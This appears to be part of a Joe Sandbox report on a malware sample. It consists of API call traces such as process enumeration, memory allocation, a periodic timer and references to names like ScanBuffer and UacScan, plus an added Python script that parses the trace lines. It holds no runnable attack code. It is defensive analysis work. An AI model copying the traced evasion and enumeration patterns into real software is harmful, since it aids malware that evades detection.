  • Part of subcall function 02DB5ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02DB0000,02DDE790), ref: 02DB5AE8
  • Part of subcall function 02DB5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DB0000,02DDE790), ref: 02DB5B06
  • Part of subcall function 02DB5ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DB0000,02DDE790), ref: 02DB5B24
  • Part of subcall function 02DB5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02DB5B42
  • Part of subcall function 02DB5ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02DB5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02DB5B8B
  • Part of subcall function 02DB5ACC: RegQueryValueExA.ADVAPI32(?,02DB5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02DB5BD1,?,80000001), ref: 02DB5BA9
  • Part of subcall function 02DB5ACC: RegCloseKey.ADVAPI32(?,02DB5BD8,00000000,?,?,00000000,02DB5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DB5BCB
Similarity
• API ID: Open$FileModuleNameQueryValue$Close
• String ID:
• API String ID: 2796650324-0
• Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
• Instruction ID: 1813bf42b4283f0e3e60af16beac1b669039d8b296f41cbb213c08f7ad564559
• Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
• Instruction Fuzzy Hash: 45E032B1A00214CBCB11DEA8D8D0A863398AF08750F4409A1AC69DF34AD7B1DE208BE0
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02DB7DF4
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
• Instruction ID: 94e87805ecc4f1aca75f88026ed87b81891f4cb7178745e769769884caee809b
• Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
• Instruction Fuzzy Hash: 16D012B62091506AE225965A5D44EE75ADCCFC6770F10062DF558C6280D6208C01C6B1
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000105,02F2B8B8,?,02DD0751,ScanBuffer,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,ScanBuffer,02E37380,02DDB7B8,OpenSession), ref: 02DBC37B
Similarity
• API ID: FileModuleName
• String ID:
• API String ID: 514040917-0
• Opcode ID: 3818fc34a582c407a61fce0ad44f420a5e60d8709c0364907f1d5cfe12aef04d
• Instruction ID: fcf8b56b1c761ce497465a2eb80e153684969ae2f85f49d24c4f79c159b4ca2b
• Opcode Fuzzy Hash: 3818fc34a582c407a61fce0ad44f420a5e60d8709c0364907f1d5cfe12aef04d
• Instruction Fuzzy Hash: E4D0A7A270051417D201D16C0C918FB31CD8F88650F0001216999C6381F9508E0006E1
APIs
• GetFileAttributesA.KERNEL32(00000000,?,02DD356F,ScanString,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,ScanBuffer,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,Initialize), ref: 02DB7E8B
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 293aa77a7d6da3b19ba7d9126c77eb54a59076424d0e0964b47b095df0aba2f3
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13C08CF72122028B7E62A5BC5CE42D943898DC8134B601E61E43ACA3C2E326DC222830
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,02DD041F,ScanString,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,ScanString,02E37380,02DDB7B8,UacScan,02E37380,02DDB7B8,UacInitialize), ref: 02DB7E67
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5f506675f3d5e98c681e726eb5e96af138d53fc590ee87c078ade177017d31d6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13C080A5201101477D5155BC1CE42C551898D441347540A51E436C63D2D321DC525420
APIs
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
• Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
• Instruction ID: d3f1a7ff4bf156d0d953e89881a5fec61356df3402f95d26b7785939bc046c17
• Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
• Instruction Fuzzy Hash: A5C012A260023097EB639699ACE079662CCDF05695F1440A19406D7355E360DC0086B1
APIs
• timeSetEvent.WINMM(00002710,00000000,02DDC350,00000000,00000001), ref: 02DDC36C
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: Eventtime
• String ID:
• API String ID: 2982266575-0
• Opcode ID: eefee8da34959ccf4193e6b722564a8eb9a007003d88b57c44de4cdd4ae6f54b
• Instruction ID: d98a1a512441d74cef6273ec799876eb7fcff95cba77ad776d842d8ea53eb909
• Opcode Fuzzy Hash: eefee8da34959ccf4193e6b722564a8eb9a007003d88b57c44de4cdd4ae6f54b
• Instruction Fuzzy Hash: D3C04CB17A07006BF91156655C92F62669DD705751F100412B705A93C1D1A25C114E64
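The API entries above are shown in Joe Sandbox's raw trace form: function name, exporting module, the stack values at the call site as hex words (or `?` where the sandbox could not resolve one), and the return address. Reading them by hand is error-prone, so the following added example (not Joe Sandbox code, and not part of the original report) parses three lines copied from this section and decodes the `timeSetEvent` arguments against the WinMM prototype `timeSetEvent(uDelay, uResolution, lpTimeProc, dwUser, fuEvent)`: 0x2710 is a 10000 ms delay, the third word is the callback address, and the last word is the `fuEvent` flag set, with `TIME_PERIODIC` meaning the callback fires every interval rather than once. It also pulls the non-hex tokens out of the `GetFileAttributesA` argument list so the string-like stack values are visible as a list. The line regex and the helper names are this example's own assumptions about the trace format.

```python
import re
from dataclasses import dataclass, field
from typing import List, Dict, Any

# Constructed sample: three API lines copied from the report section above.
# Format (assumed from the report): Function.MODULE(arg,...), ref: <call-site address>
SAMPLE_LINES = [
    "GetFileAttributesA.KERNEL32(00000000,?,02DD356F,ScanString,02E37380,02DDB7B8,"
    "OpenSession,02E37380,02DDB7B8,ScanBuffer,02E37380,02DDB7B8,OpenSession,"
    "02E37380,02DDB7B8,Initialize), ref: 02DB7E8B",
    "timeSetEvent.WINMM(00002710,00000000,02DDC350,00000000,00000001), ref: 02DDC36C",
    "SysAllocStringLen.OLEAUT32(00000000,?), ref: 02DB4C3F",
]

# Hypothetical regex for the trace line shape; the sandbox does not publish a grammar.
API_LINE = re.compile(
    r"^(?P<func>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
HEX_WORD = re.compile(r"^[0-9A-Fa-f]{8}$")

# fuEvent flags from mmsystem.h
TIME_PERIODIC = 0x0001
TIME_CALLBACK_EVENT_SET = 0x0010
TIME_CALLBACK_EVENT_PULSE = 0x0020
TIME_KILL_SYNCHRONOUS = 0x0100
FU_EVENT_FLAGS = {
    TIME_PERIODIC: "TIME_PERIODIC",
    TIME_CALLBACK_EVENT_SET: "TIME_CALLBACK_EVENT_SET",
    TIME_CALLBACK_EVENT_PULSE: "TIME_CALLBACK_EVENT_PULSE",
    TIME_KILL_SYNCHRONOUS: "TIME_KILL_SYNCHRONOUS",
}


@dataclass
class ApiCall:
    func: str
    module: str
    args: List[str] = field(default_factory=list)  # raw stack words as printed
    ref: int = 0  # return address of the call site


def parse_api_line(line: str) -> ApiCall:
    """Split one sandbox API line into function, module, raw args and call-site address."""
    m = API_LINE.match(line.strip())
    if not m:
        raise ValueError(f"not an API trace line: {line!r}")
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    return ApiCall(m.group("func"), m.group("module"), args, int(m.group("ref"), 16))


def symbolic_args(call: ApiCall) -> List[str]:
    """Return stack words that are neither 8-digit hex values nor the unresolved marker '?'."""
    return [a for a in call.args if a != "?" and not HEX_WORD.match(a)]


def decode_time_set_event(call: ApiCall) -> Dict[str, Any]:
    """Interpret the five stack words of timeSetEvent(uDelay, uResolution, lpTimeProc, dwUser, fuEvent)."""
    if call.func != "timeSetEvent" or len(call.args) < 5:
        raise ValueError("expected a timeSetEvent call with five arguments")
    delay, resolution, callback, user, fu_event = (int(a, 16) for a in call.args[:5])
    flags = [name for bit, name in FU_EVENT_FLAGS.items() if fu_event & bit]
    if not fu_event & TIME_PERIODIC:
        flags.insert(0, "TIME_ONESHOT")  # TIME_ONESHOT is 0, so it is the absence of TIME_PERIODIC
    return {
        "delay_ms": delay,
        "resolution_ms": resolution,
        "callback": callback,
        "user_data": user,
        "periodic": bool(fu_event & TIME_PERIODIC),
        "flags": flags,
    }


if __name__ == "__main__":
    for call in (parse_api_line(l) for l in SAMPLE_LINES):
        print(f"{call.module}!{call.func} @ {call.ref:08X}  strings={symbolic_args(call)}")
        if call.func == "timeSetEvent":
            print("  ", decode_time_set_event(call))
```

Running it shows the timer registered at call site 02DDC36C as a 10-second periodic callback into 02DDC350, which is the kind of detail worth carrying into a triage note alongside the raw line.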
APIs
• SysAllocStringLen.OLEAUT32(00000000,?), ref: 02DB4C3F
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: AllocString
• String ID:
• API String ID: 2525500382-0
• Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
• Instruction ID: 5c92a0841c725d2ac54238f137691ca348ed6aa3d67318eacd1d2bcdc1b20e69
• Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42B09225208201D5EA5A66620E31BF2004C4F40E8BF8400519E6BC8292EA00CC01C835
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 02DB4C57
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3341692771-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ce3c9a0a5c178fd9229107eacb1d0e63a01344caf322213119fc1c456583412a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FBA011A88002028A8A0B222800320AE2222AEC0A00B88C0A802020A2028A2A8800AA30
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02DB1A03,?,02DB2000), ref: 02DB15E2
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 54b491499dee4b211d5ae4c8f5005ce93bfd00207832992ef8a63e6439095a5e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0bbfc736b3652ab7e494dd687beb3eae56c62c819a1d09fb6d2eb1742772caa9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54b491499dee4b211d5ae4c8f5005ce93bfd00207832992ef8a63e6439095a5e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87F062F0B813008FDB06CFBA99553457BE2EB8A346F50C579D609DB3C4E77184418B10
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02DB2000), ref: 02DB16A4
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8f7b340c3562b87aa945686db9c3492693a9621e70308811a099a50957b3c0ae
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fb2d5ee0a1a5db47ddc8092dda813f2fc741b4f18c317641c4f3549a128f96c0
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f7b340c3562b87aa945686db9c3492693a9621e70308811a099a50957b3c0ae
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2F090B2A84699BBD7119F6ADC94782BB98FB00315F854139F90897340D770EC50CB98
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02DB1704
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: 66cba08929cc815761ffd75d4af2b04dc98a4a34dcb69aaa8a22dc2988f85be0
• Instruction ID: 4494bbadabbbeabfdfefded1810a5a0516ce2fef7285d2e49ee2b1f0ebaf3435
• Opcode Fuzzy Hash: 66cba08929cc815761ffd75d4af2b04dc98a4a34dcb69aaa8a22dc2988f85be0
• Instruction Fuzzy Hash: 47E08C75300311EFEB115A7A9DA4B92ABDCEF48664F244476F64ADB381D2A0EC208B74
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02DCADA3,?,?,02DCAE35,00000000,02DCAF11), ref: 02DCAB30
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02DCAB48
• GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02DCAB5A
• GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02DCAB6C
• GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02DCAB7E
• GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02DCAB90
• GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02DCABA2
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 02DCABB4
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02DCABC6
• GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02DCABD8
• GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02DCABEA
• GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02DCABFC
• GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02DCAC0E
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 02DCAC20
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02DCAC32
• GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02DCAC44
• GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02DCAC56
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
• API String ID: 667068680-597814768
• Opcode ID: ec111957e5a75dc911eec2850e03d7be93231f6a4852725b7ab1965d2fe12aff
• Instruction ID: 00e911867e029e0a24be3cf2193ed738117f3f4c1bc6314c457339e2fbcd43f3
• Opcode Fuzzy Hash: ec111957e5a75dc911eec2850e03d7be93231f6a4852725b7ab1965d2fe12aff
• Instruction Fuzzy Hash: 643103F2980299AFEF05DFB5E988A5573A9EF09202B500D95A401CF344E674EC90CF61
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,02DB737C,02DB0000,02DDE790), ref: 02DB5925
• GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02DB593C
• lstrcpynA.KERNEL32(?,?,?), ref: 02DB596C
• lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02DB737C,02DB0000,02DDE790), ref: 02DB59D0
• lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02DB737C,02DB0000,02DDE790), ref: 02DB5A06
• FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02DB737C,02DB0000,02DDE790), ref: 02DB5A19
• FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DB737C,02DB0000,02DDE790), ref: 02DB5A2B
• lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DB737C,02DB0000,02DDE790), ref: 02DB5A37
• lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DB737C,02DB0000), ref: 02DB5A6B
• lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DB737C), ref: 02DB5A77
• lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02DB5A99
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
• String ID: GetLongPathNameA$\$kernel32.dll
• API String ID: 3245196872-1565342463
• Opcode ID: 78e5c38218f0888fbb23fc7bd34f6a9e4c8fc00d083bba69d37f53e4e4362ac2
• Instruction ID: 9de1405e0c6ca2198858a77c5691f4c8015473bbee8dc586e452a23acd5b6e7e
• Opcode Fuzzy Hash: 78e5c38218f0888fbb23fc7bd34f6a9e4c8fc00d083bba69d37f53e4e4362ac2
• Instruction Fuzzy Hash: 05414B71D00219EBDB12DAA8DCA8ADEB7BDEF09340F4445A5A14AE7341E730EE44CF60
APIs
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02DB5BE8
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02DB5BF5
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02DB5BFB
• lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02DB5C26
